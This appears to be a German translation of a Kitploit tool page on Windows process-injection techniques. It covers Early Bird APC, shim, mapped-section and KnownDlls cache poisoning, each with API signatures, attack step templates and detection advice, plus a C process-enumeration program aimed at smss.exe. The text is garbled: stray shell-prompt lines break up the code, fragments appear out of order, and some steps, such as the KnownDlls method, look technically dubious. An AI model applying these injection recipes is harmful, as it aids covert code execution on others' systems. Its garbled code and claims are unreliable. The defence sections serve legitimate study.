Diese Technik injiziert Code in einen Prozess während seiner Initialisierung, bevor der Hauptthread mit der Ausführung beginnt.

Wichtige APIs:
- [`CreateProcess`](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa)  ```c
BOOL CreateProcessA(
  LPCSTR                lpApplicationName,
  LPSTR                 lpCommandLine,
  LPSECURITY_ATTRIBUTES lpProcessAttributes,
  LPSECURITY_ATTRIBUTES lpThreadAttributes,
  BOOL                  bInheritHandles,
  DWORD                 dwCreationFlags,
  LPVOID                lpEnvironment,
  LPCSTR                lpCurrentDirectory,
  LPSTARTUPINFOA        lpStartupInfo,
  LPPROCESS_INFORMATION lpProcessInformation
);
  • VirtualAllocEx (siehe oben)
  • WriteProcessMemory (siehe oben)
  • QueueUserAPC (siehe oben)
  • ResumeThread (siehe oben)

Vorlage:

  1. Erstellen Sie einen neuen Prozess im angehaltenen Zustand mithilfe von CreateProcess mit dem Flag CREATE_SUSPENDED
  2. Reservieren Sie Speicher im neuen Prozess mithilfe von VirtualAllocEx
  3. Schreiben Sie den Payload mithilfe von WriteProcessMemory in den reservierten Speicher
  4. Reihen Sie eine APC mithilfe von QueueUserAPC in die Warteschlange des Hauptthreads ein, die auf den Payload verweist
  5. Setzen Sie den Hauptthread mithilfe von ResumeThread fort

Erkennung und Abwehr:

  • Überwachen Sie die Prozesserstellung mit dem Flag CREATE_SUSPENDED
  • Implementieren Sie eine Überwachung der Prozessinitialisierung, um unerwartete Codeausführung zu erkennen
  • Verwenden Sie EDR-Lösungen mit Fähigkeiten zur Erkennung von Early-Bird-Injection-Techniken
  • Setzen Sie verhaltensbasierte Erkennung ein, um Prozesse mit abnormalen Initialisierungsmustern zu identifizieren

22. Shim-basierte Injection

Diese Technik nutzt das Windows Application Compatibility Framework, um Code zu injizieren.

Wichtige APIs:

  • SdbCreateDatabase ```c PDB SdbCreateDatabase( LPCWSTR pwszPath );
    root@kitploit:~
  • SdbWriteDWORDTag ```c BOOL SdbWriteDWORDTag( PDB pdb, TAG tTag, DWORD dwData );
    root@kitploit:~
  • SdbEndWriteListTag ```c BOOL SdbEndWriteListTag( PDB pdb, TAG tTag );
    root@kitploit:~

Template:

  1. Erstellen Sie eine Shim-Datenbank mit SdbCreateDatabase
  2. Schreiben Sie Shim-Daten in die Datenbank, einschließlich der Payload und der Zielanwendung
  3. Installieren Sie die Shim-Datenbank mit sdbinst.exe
  4. Die Payload wird ausgeführt, wenn die Zielanwendung gestartet wird

Detection and Defense:

  • Überwachen Sie verdächtige Erstellung und Installation von Shim-Datenbanken
  • Implementieren Sie Überwachung von Anwendungskompatibilitäts-Shims
  • Verwenden Sie EDR-Lösungen mit Fähigkeiten zur Erkennung von Shim-basierten Injektionstechniken
  • Setzen Sie Whitelisting für genehmigte Shims ein und blockieren Sie nicht autorisierte Shim-Installationen

23. Mapping-Injektion

Diese Technik verwendet speicherabgebildete Dateien, um Code in einen entfernten Prozess zu injizieren.

Wichtige APIs:

  • CreateFileMapping ```c HANDLE CreateFileMappingA( HANDLE hFile, LPSECURITY_ATTRIBUTES lpFileMappingAttributes, DWORD flProtect, DWORD dwMaximumSizeHigh, DWORD dwMaximumSizeLow, LPCSTR lpName );
    root@kitploit:~
  • MapViewOfFile ```c LPVOID MapViewOfFile( HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow, SIZE_T dwNumberOfBytesToMap );
    root@kitploit:~
  • NtMapViewOfSection (Undokumentiert) ```c NTSTATUS NTAPI NtMapViewOfSection( HANDLE SectionHandle, HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, SECTION_INHERIT InheritDisposition, ULONG AllocationType, ULONG Win32Protect );
    root@kitploit:~

Template:

  1. Erstellen Sie ein Dateizuordnungsobjekt mit CreateFileMapping
  2. Mappen Sie eine Ansicht der Datei in den aktuellen Prozess mit MapViewOfFile
  3. Schreiben Sie die Nutzlast in die gemappte Ansicht
  4. Verwenden Sie NtMapViewOfSection, um die Ansicht in den Zielprozess zu mappen
  5. Führen Sie die Nutzlast im Zielprozess aus

Erkennung und Abwehr:

  • Überwachen Sie auf verdächtige Muster bei Dateizuordnung und Ansichtserstellung
  • Implementieren Sie eine Überwachung der Speicherzuordnung, um unerwartete Nutzung von gemeinsamem Speicher zu erkennen
  • Verwenden Sie EDR-Lösungen, die Mapping-Injection-Techniken erkennen können
  • Setzen Sie verhaltensbasierte Erkennung ein, um Prozesse mit ungewöhnlicher Nutzung speicherzugeordneter Dateien zu identifizieren

24. KnownDlls Cache Poisoning

Bei dieser Technik wird eine legitime DLL im KnownDlls-Cache durch eine schädliche DLL ersetzt.

Wichtige APIs:

  • NtSetSystemInformation (Undokumentiert) ```c NTSTATUS NTAPI NtSetSystemInformation( SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength );
    root@kitploit:~
  1. Erstellen Sie eine schädliche DLL mit demselben Namen wie ein legitimer KnownDlls-Eintrag.
  2. Erstellen Sie ein Section-Objekt für die schädliche DLL:
    • Verwenden Sie NtCreateSection, um ein Section-Objekt zu erstellen.
    • Mappen Sie eine Ansicht des Sections in den Speicher.
    • Schreiben Sie den Inhalt der schädlichen DLL in die gemappte Ansicht.
  3. Verwenden Sie NtSetSystemInformation mit SystemExtendServiceTableInformation, um die schädliche DLL zum KnownDlls-Cache hinzuzufügen.
  4. Die schädliche DLL wird anstelle der legitimen DLL von Prozessen geladen.

Erkennung und Abwehr:

  • Implementieren Sie Integritätsprüfungen für KnownDlls.
  • Überwachen Sie Änderungen am KnownDlls-Cache.
  • Nutzen Sie EDR-Lösungen mit Funktionen zur Erkennung von KnownDlls-Cache-Vergiftungen.
  • Setzen Sie Whitelisting und Codesignatur-Überprüfung für DLLs im KnownDlls-Cache ein.

Zusätzliche Überlegungen zur Erkennung und Abwehr

  1. Implementieren Sie eine robuste Anwendungs-Whitelisting-Strategie, um unbefugte ausführbare Dateien und DLLs am Ausführen zu hindern.
  2. Verwenden Sie Windows Defender Exploit Guard oder ähnliche Technologien, um Attack Surface Reduction (ASR)-Regeln zu aktivieren.
  3. Halten Sie Systeme und Software mit den neuesten Sicherheitspatches auf dem neuesten Stand.
  4. Nutzen Sie die Benutzerkontensteuerung (UAC) und das Prinzip der geringsten Rechte, um die Auswirkungen erfolgreicher Injektionen zu begrenzen.
  5. Implementieren Sie Netzwerksegmentierung, um laterale Bewegung im Falle eines erfolgreichen Angriffs einzuschränken.
  6. Verwenden Sie Runtime Application Self-Protection (RASP)-Technologien, um Injektionsversuche in Echtzeit zu erkennen und zu verhindern.
  7. Führen Sie regelmäßig Threat-Hunting-Aktivitäten durch, um proaktiv nach Anzeichen von Injektionstechniken zu suchen.
  8. Implementieren und pflegen Sie ein robustes Security Information and Event Management (SIEM)-System, um Sicherheitsereignisse zu korrelieren und zu analysieren.
  9. Führen Sie regelmäßige Sicherheitsbewusstseinstrainings für Benutzer durch, um verdächtige Aktivitäten zu erkennen und zu melden.
  10. Führen Sie regelmäßige Penetrationstests und Red-Team-Übungen durch, um Schwachstellen zu identifizieren und die Abwehr gegen Injektionstechniken zu verbessern.

Prozess-Enumeration```c

#include <stdio.h> #include <Windows.h> #include <tlhelp32.h> #include <errhandlingapi.h> // GetLastError #include <heapapi.h> // HeapCreate, HeapAlloc, HeapDestroy #include <strsafe.h> // StringCchPrintf #include <assert.h> #include <tchar.h>

void ErrorExit(LPCTSTR lpszFunction); int ProcessEnumerateAndSearch(const wchar_t* ProcessName, PROCESSENTRY32* lppe); int PrintProcessInfo(const PROCESSENTRY32* lppe);

int PrintProcessInfo(const PROCESSENTRY32* lppe) { assert(lppe);

root@kitploit:~
wprintf(L"PROCESS : %ls\n", lppe->szExeFile);

int PID = static_cast<int>(lppe->th32ProcessID);
if (PID == 0) {
    wprintf(L"ERR : Process Not Found.\n");
    return 0;
}

wprintf(L"PID : %i\n\n", PID);
return 1;

}

void ErrorExit(LPCTSTR functionName) { constexpr DWORD FLAGS = FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS; constexpr DWORD LANG_ID = MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT); constexpr size_t EXTRA_CHARS = 40;

root@kitploit:~
DWORD errorCode = GetLastError();
LPTSTR messageBuf = nullptr;

FormatMessage(FLAGS, NULL, errorCode, LANG_ID, (LPTSTR)&messageBuf, 0, NULL);

if (messageBuf) {
    size_t funcNameLen = _tcslen(functionName);
    size_t messageLen = _tcslen(messageBuf);
    size_t bufSize = (funcNameLen + messageLen + EXTRA_CHARS) * sizeof(TCHAR);

    LPTSTR displayBuf = static_cast<LPTSTR>(LocalAlloc(LMEM_ZEROINIT, bufSize));
    if (displayBuf) {
        StringCchPrintf(displayBuf, LocalSize(displayBuf) / sizeof(TCHAR), TEXT("%s failed with error %d: %s"), functionName, errorCode, messageBuf);
        MessageBox(NULL, displayBuf, TEXT("Error"), MB_OK);

        LocalFree(displayBuf);
    }

    LocalFree(messageBuf);
}

ExitProcess(errorCode);

}

int ProcessEnumerateAndSearch(const wchar_t* ProcessName, PROCESSENTRY32* lppe) { assert(ProcessName && lppe);

root@kitploit:~
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE)
    ErrorExit(TEXT("CreateToolhelp32Snapshot"));

lppe->dwSize = sizeof(PROCESSENTRY32);

if (Process32First(hSnapshot, lppe) == FALSE) {
    CloseHandle(hSnapshot);
    ErrorExit(TEXT("Process32First"));
}

int pFoundFlag = 0;
do {
    size_t wcProcessName = wcslen(ProcessName);
    if (wcsncmp(lppe->szExeFile, ProcessName, wcProcessName) == 0) {
        if (!PrintProcessInfo(lppe)) continue;
        pFoundFlag = 1;
        break;
    }
} while (Process32Next(hSnapshot, lppe));

CloseHandle(hSnapshot);

return pFoundFlag;

}

int main(int argc, char** argv) { wchar_t pName[] = L"smss.exe"; // process name we will be injecting PROCESSENTRY32 lppe = { 0 };

root@kitploit:~
if (ProcessEnumerateAndSearch(pName, &lppe)) {
    // do some stuff
}
else {
    return 1;
}

return 0;

}

root@kitploit:~
Tool herunterladen
root@kitploit:~
  • NtCreateThread (Undokumentiert) ```c NTSTATUS NTAPI NtCreateThread( OUT PHANDLE ThreadHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN HANDLE ProcessHandle, OUT PCLIENT_ID ClientId, IN PCONTEXT ThreadContext, IN PINITIAL_TEB InitialTeb, IN BOOLEAN CreateSuspended );
    root@kitploit:~
  • RtlCreateUserThread (Undokumentiert) ```c NTSTATUS NTAPI RtlCreateUserThread( IN HANDLE ProcessHandle, IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL, IN BOOLEAN CreateSuspended, IN ULONG StackZeroBits, IN OUT PULONG StackReserved, IN OUT PULONG StackCommit, IN PVOID StartAddress, IN PVOID StartParameter OPTIONAL, OUT PHANDLE ThreadHandle, OUT PCLIENT_ID ClientId );
    root@kitploit:~
  • NtQueueApcThread (Undokumentiert) ```c NTSTATUS NTAPI NtQueueApcThread( IN HANDLE ThreadHandle, IN PIO_APC_ROUTINE ApcRoutine, IN PVOID ApcRoutineContext OPTIONAL, IN PIO_STATUS_BLOCK ApcStatusBlock OPTIONAL, IN ULONG ApcReserved OPTIONAL );
    root@kitploit:~
  • RtlCreateUserThread (siehe oben)
  • NtQueryInformationProcess (Nicht dokumentiert, siehe oben)
  • NtCreateThreadEx (Nicht dokumentiert) ```c NTSTATUS NTAPI NtCreateThreadEx( OUT PHANDLE ThreadHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN HANDLE ProcessHandle, IN PVOID StartRoutine, IN PVOID Argument OPTIONAL, IN ULONG CreateFlags, IN SIZE_T ZeroBits, IN SIZE_T StackSize, IN SIZE_T MaximumStackSize, IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL );
    root@kitploit:~
  • RollbackTransaction ```c BOOL RollbackTransaction( HANDLE TransactionHandle );
    root@kitploit:~
  • SetPropA
    root@kitploit:~